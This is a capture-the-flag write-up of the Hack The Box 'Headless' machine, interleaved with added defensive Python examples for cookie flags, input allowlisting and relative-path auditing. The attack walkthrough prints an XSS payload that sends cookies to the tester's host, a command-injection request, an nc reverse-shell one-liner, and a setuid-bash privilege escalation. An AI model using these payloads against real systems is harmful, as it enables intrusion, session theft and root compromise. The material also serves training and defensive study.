Port scanning

┌──(mikannse㉿kali)-[~/HTB/headless]
└─$ sudo nmap --min-rate=10000 -p- 10.10.11.8
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-02 21:08 CST
Warning: 10.10.11.8 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.8
Host is up (0.088s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp

Nmap done: 1 IP address (1 host up) scanned in 10.35 seconds
┌──(mikannse㉿kali)-[~/HTB/headless]
└─$ sudo nmap -sT -sV -sC -O -p22,5000 10.10.11.8
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-02 21:09 CST
Nmap scan report for 10.10.11.8
Host is up (0.062s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 90:02:94:28:3d:ab:22:74:df:0e:a3:b2:0f:2b:c6:17 (ECDSA)
|_ 256 2e:b9:08:24:02:1b:60:94:60:b3:84:a9:9e:1a:60:ca (ED25519)
5000/tcp open upnp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/2.2.2 Python/3.11.2
| Date: Mon, 02 Sep 2024 12:59:13 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 2799
| Set-Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs; Path=/
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Under Construction</title>
| <style>
| body {
| font-family: 'Arial', sans-serif;
| background-color: #f7f7f7;
| margin: 0;
| padding: 0;
| display: flex;
| justify-content: center;
| align-items: center;
| height: 100vh;
| .container {
| text-align: center;
| background-color: #fff;
| border-radius: 10px;
| box-shadow: 0px 0px 20px rgba(0, 0, 0, 0.2);
| RTSPRequest:
| <!DOCTYPE HTML>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following
<snip>
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (96%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.92 seconds

Web

Port 5000 hosts a Python service. Once inside there is a /support route with a form you can fill in, and no other obvious point of attack. There is also an is_admin cookie, so my blind guess is that the intended path is XSS to hijack cookies; I fire up XSS-steal.py.

When I submit the following payload it gets detected, so some obfuscation may be needed:

<script>new Image().src="http://ip:8888/?"+document.cookie;</script>

So I tried

<sscriptcript>var i=new Image;i.src="http://10.10.14.11:8888/?"+document.cookie;</sscriptcript>

This time it got past the WAF, but it does not seem to have fired. Going back to the detection page, our request parameters are listed there, so I try setting the User-Agent to the payload:

POST /support HTTP/1.1
Host: 10.10.11.8:5000
User-Agent: <script>new Image().src="http://vpnip:8888/?"+document.cookie;</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
Origin: http://10.10.11.8:5000
Connection: keep-alive
Referer: http://10.10.11.8:5000/support
Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs
Upgrade-Insecure-Requests: 1

fname=one&lname=one&email=114514%40gmail.com&phone=1414141&message=%3Cscript%3E

Cookies hijacked successfully; the second one is the admin's cookie. After swapping it in, nothing useful showed up, so the backend paths probably have to be brute-forced.

┌──(mikannse㉿kali)-[~/tools/web]
└─$ python2 XSS-cookie-stealer.py
Started http server

2024-09-02 09:48 PM - 10.10.14.11 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
------------------------------------------------------------------------------------------------------------------
is_admin ['InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs']

2024-09-02 09:48 PM - 10.10.11.8 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
------------------------------------------------------------------------------------------------------------------
is_admin ['ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0']
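The cookie from the scan and the two values the stealer logged, looked at from the defender's side as an added example (not code from the writeup or the box): a small Python check that reports which protective attributes the Set-Cookie header lacks, which is the reason document.cookie could read is_admin at all, and that decodes the payload half of the itsdangerous-style value to show the cookie is a signed role claim rather than an opaque session id. The header and cookie values are copied from the page; the two-segment payload.signature layout is an assumption about the format, and hardened_set_cookie shows what the same header looks like with the flags set.

```python
import base64
import json
from http.cookies import SimpleCookie

# Copied from the page: the Set-Cookie line nmap's fingerprint-strings captured
# from the Werkzeug app on port 5000, and the two values the stealer logged.
SET_COOKIE_HEADER = "is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs; Path=/"
USER_COOKIE = "InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs"
ADMIN_COOKIE = "ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0"

# Attributes a role/session cookie needs: HttpOnly keeps it out of document.cookie,
# Secure keeps it off plaintext HTTP, SameSite limits cross-site sending.
REQUIRED_FLAGS = ("httponly", "secure", "samesite")


def audit_set_cookie(header_value: str) -> dict:
    """Map each cookie in a Set-Cookie value to the list of protective flags it lacks."""
    jar = SimpleCookie()
    jar.load(header_value)
    report = {}
    for name, morsel in jar.items():
        # Morsel returns "" for an attribute that was never set.
        report[name] = [flag for flag in REQUIRED_FLAGS if not morsel[flag]]
    return report


def hardened_set_cookie(name: str, value: str) -> str:
    """Build the Set-Cookie line the app should have sent for the same value."""
    jar = SimpleCookie()
    jar[name] = value
    jar[name]["path"] = "/"
    jar[name]["httponly"] = True
    jar[name]["secure"] = True
    jar[name]["samesite"] = "Strict"
    return jar[name].OutputString()


def decode_signed_cookie(value: str) -> tuple:
    """Split an itsdangerous-style 'payload.signature' cookie and decode the payload.

    Assumption: two dot-separated segments (a plain Signer, no timestamp). The payload
    is URL-safe base64 with padding stripped, so padding is restored first. Only the
    payload is readable here; checking the signature needs the server's secret key,
    which is why a stolen admin value works but an edited one does not.
    """
    payload_b64, _, signature = value.partition(".")
    padded = payload_b64 + "=" * (-len(payload_b64) % 4)
    claim = json.loads(base64.urlsafe_b64decode(padded).decode())
    return claim, signature


if __name__ == "__main__":
    print("missing flags:", audit_set_cookie(SET_COOKIE_HEADER))
    print("hardened    :", hardened_set_cookie("is_admin", USER_COOKIE))
    for cookie in (USER_COOKIE, ADMIN_COOKIE):
        claim, sig = decode_signed_cookie(cookie)
        print(f"claim={claim!r} signature={sig}")
```

The audit shows the is_admin cookie carries no HttpOnly, Secure or SameSite attribute, and the decoded payloads are the JSON strings "user" and "admin": the whole authorization decision rides on a role string in a cookie that any injected script can read.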

A directory scan turns up /dashboard. Visiting it lets you generate something, and this kind of feature is obviously command injection through string concatenation:

POST /dashboard HTTP/1.1
Host: 10.10.11.8:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://10.10.11.8:5000
Connection: keep-alive
Referer: http://10.10.11.8:5000/dashboard
Cookie: is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
Upgrade-Insecure-Requests: 1

date=2023-09-15;whoami

We are now running as dvir. URL-encode the following payload and send it; the reverse shell comes back, success.

2023-09-15;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc vpnip 443 >/tmp/f
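The dashboard behaviour above, reconstructed from the defender's side as an added example (not the box's application code): a hypothetical handler that builds the shell line the way the box evidently does, beside a hardened version that allowlists the date parameter and passes it as a single argv element with no shell at all, plus a small request-body scanner that flags form fields carrying shell metacharacters, including URL-encoded ones like the payload the writeup sends. The script path /opt/app/report.sh and the field names are assumptions.

```python
import re
import subprocess
from datetime import date
from urllib.parse import unquote_plus

# Hypothetical location of the script the dashboard runs; not from the box.
REPORT_SCRIPT = "/opt/app/report.sh"
DATE_RE = re.compile(r"\d{4}-\d{2}-\d{2}")
# Characters that change the meaning of a line handed to /bin/sh.
SHELL_META = re.compile(r"[;&|`$()<>\n]")


def vulnerable_command(user_date: str) -> str:
    """'Before' pattern: the parameter is pasted into a shell command string.

    Returned instead of executed so the injected second command is visible
    without running anything.
    """
    return f"bash {REPORT_SCRIPT} {user_date}"


def parse_report_date(user_date: str) -> date:
    """Allowlist: exactly YYYY-MM-DD and a real calendar date, else ValueError."""
    if not DATE_RE.fullmatch(user_date):
        raise ValueError(f"rejected date parameter: {user_date!r}")
    return date.fromisoformat(user_date)  # rejects 2023-13-45 as well


def is_rejected(user_date: str) -> bool:
    """True when the allowlist refuses the value."""
    try:
        parse_report_date(user_date)
    except ValueError:
        return True
    return False


def build_report_argv(user_date: str) -> list:
    """'After' pattern: validated value as ONE argv element, no shell involved."""
    return [REPORT_SCRIPT, parse_report_date(user_date).isoformat()]


def run_report(user_date: str) -> str:
    """Execute the hardened form; a trailing ';whoami' never reaches a shell here."""
    proc = subprocess.run(build_report_argv(user_date), check=True,
                          capture_output=True, text=True)
    return proc.stdout


def parse_form_body(body: str) -> dict:
    """Minimal x-www-form-urlencoded parser: split on '&' only, then decode.

    Deliberately does not treat ';' as a separator, so a value such as
    '2023-09-15;whoami' stays intact and can be inspected as one field.
    """
    fields = {}
    for pair in body.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields


def suspicious_fields(body: str) -> dict:
    """Return {field: decoded value} for fields carrying shell metacharacters."""
    return {k: v for k, v in parse_form_body(body).items() if SHELL_META.search(v)}


if __name__ == "__main__":
    # Constructed sample bodies: the one from the writeup and a URL-encoded variant.
    for body in ("date=2023-09-15;whoami", "date=2023-09-15%3Bid", "date=2023-09-15"):
        print(f"{body!r:32} flagged={suspicious_fields(body)}")
    print("shell string the vulnerable form would run:",
          vulnerable_command("2023-09-15;whoami"))
    print("argv the hardened form runs:", build_report_argv("2023-09-15"))
```

The scanner is the detection side: run it over the POST bodies in the access log (or in a WAF rule) and the injected request stands out because the date field contains a ';'. The allowlist is the fix: the only way to make the injected string pass is to remove everything after the date.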

Privilege escalation

There is one sudo entry:

dvir@headless:~$ sudo -l
Matching Defaults entries for dvir on headless:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty

User dvir may run the following commands on headless:
(ALL) NOPASSWD: /usr/bin/syscheck
cat /usr/bin/syscheck
#!/bin/bash

if [ "$EUID" -ne 0 ]; then
    exit 1
fi

last_modified_time=$(/usr/bin/find /boot -name 'vmlinuz*' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1)
formatted_time=$(/usr/bin/date -d "@$last_modified_time" +"%d/%m/%Y %H:%M")
/usr/bin/echo "Last Kernel Modification Time: $formatted_time"

disk_space=$(/usr/bin/df -h / | /usr/bin/awk 'NR==2 {print $4}')
/usr/bin/echo "Available disk space: $disk_space"

load_average=$(/usr/bin/uptime | /usr/bin/awk -F'load average:' '{print $2}')
/usr/bin/echo "System load average: $load_average"

if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
    /usr/bin/echo "Database service is not running. Starting it..."
    ./initdb.sh 2>/dev/null
else
    /usr/bin/echo "Database service is running."
fi

exit 0

Looking at this bash script briefly, the interesting part is here:

if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
    /usr/bin/echo "Database service is not running. Starting it..."
    ./initdb.sh 2>/dev/null

If there is no process named initdb.sh in the process list, it prints a message and executes initdb.sh from the current directory, so we can write our own script:

dvir@headless:/tmp$ cd /tmp
dvir@headless:/tmp$ echo -e '#!/bin/bash\ncp /bin/bash /tmp/root_bash;chmod +xs /tmp/root_bash' > /tmp/initdb.sh
dvir@headless:/tmp$ chmod +x /tmp/initdb.sh
dvir@headless:/tmp$ sudo /usr/bin/syscheck
dvir@headless:/tmp$ ./root_bash -p
root_bash-5.2# whoami
root
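The flaw in syscheck, as an added audit example rather than anything from the box: a Python checker that (a) finds commands a sudo-permitted script launches by a relative path, which resolve against the caller's working directory and therefore let the caller choose what root executes, and (b) implements the pre-execution checks a hardened syscheck should make on its helper (absolute path, regular file, expected owner, not group- or world-writable) before running it. The pgrep -x test is no protection here: it only asks whether a process with that name exists, nothing about which file is on disk. The script text is copied from the writeup; the temporary file in demo_checks is constructed for the demonstration.

```python
import os
import re
import stat
import tempfile

# Copied from the page: /usr/bin/syscheck as shown in the writeup.
SYSCHECK = """\
#!/bin/bash

if [ "$EUID" -ne 0 ]; then
    exit 1
fi

last_modified_time=$(/usr/bin/find /boot -name 'vmlinuz*' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1)
formatted_time=$(/usr/bin/date -d "@$last_modified_time" +"%d/%m/%Y %H:%M")
/usr/bin/echo "Last Kernel Modification Time: $formatted_time"

disk_space=$(/usr/bin/df -h / | /usr/bin/awk 'NR==2 {print $4}')
/usr/bin/echo "Available disk space: $disk_space"

load_average=$(/usr/bin/uptime | /usr/bin/awk -F'load average:' '{print $2}')
/usr/bin/echo "System load average: $load_average"

if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
    /usr/bin/echo "Database service is not running. Starting it..."
    ./initdb.sh 2>/dev/null
else
    /usr/bin/echo "Database service is running."
fi

exit 0
"""

# A command token starting with ./ at the start of a line or after ; & | or (.
RELATIVE_EXEC = re.compile(r"(?:^|[;&|(]\s*)(\./[^\s;&|)]+)")


def find_relative_invocations(script: str) -> list:
    """Return (line_number, token) for each command launched by a relative path."""
    hits = []
    for n, line in enumerate(script.splitlines(), 1):
        stripped = line.strip()
        if stripped.startswith("#"):
            continue
        for m in RELATIVE_EXEC.finditer(stripped):
            hits.append((n, m.group(1)))
    return hits


def safe_to_run(path: str, expected_uid: int) -> bool:
    """Pre-execution checks for a helper a privileged script is about to run.

    Absolute path (so the caller's cwd is irrelevant), a regular file, owned by
    the expected uid (root in the real script), and not writable by group/others.
    """
    if not os.path.isabs(path):
        return False
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False
    if not stat.S_ISREG(st.st_mode):
        return False
    if st.st_uid != expected_uid:
        return False
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return False
    return True


def demo_checks() -> dict:
    """Exercise safe_to_run against a constructed temporary helper script."""
    me = os.getuid()
    results = {}
    with tempfile.TemporaryDirectory() as d:
        p = os.path.join(d, "initdb.sh")
        with open(p, "w") as f:
            f.write("#!/bin/bash\necho ok\n")
        os.chmod(p, 0o755)
        results["owned_0755"] = safe_to_run(p, me)
        os.chmod(p, 0o777)
        results["world_writable"] = safe_to_run(p, me)
        os.chmod(p, 0o755)
        results["wrong_owner"] = safe_to_run(p, me + 1)
        results["relative"] = safe_to_run("initdb.sh", me)
        results["missing"] = safe_to_run(os.path.join(d, "nope.sh"), me)
    return results


if __name__ == "__main__":
    print("relative invocations:", find_relative_invocations(SYSCHECK))
    print("helper checks:", demo_checks())
```

The auditor reports the single ./initdb.sh line; the fix for the script is to call a fixed absolute path and apply the safe_to_run conditions (owner root, mode without group/world write) before executing it, which is exactly what the /tmp/initdb.sh trick above relies on being absent.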

Ramblings

In the XSS part I did not think of triggering it through a request header and got stuck for a while going down the obfuscation route; still a nice box.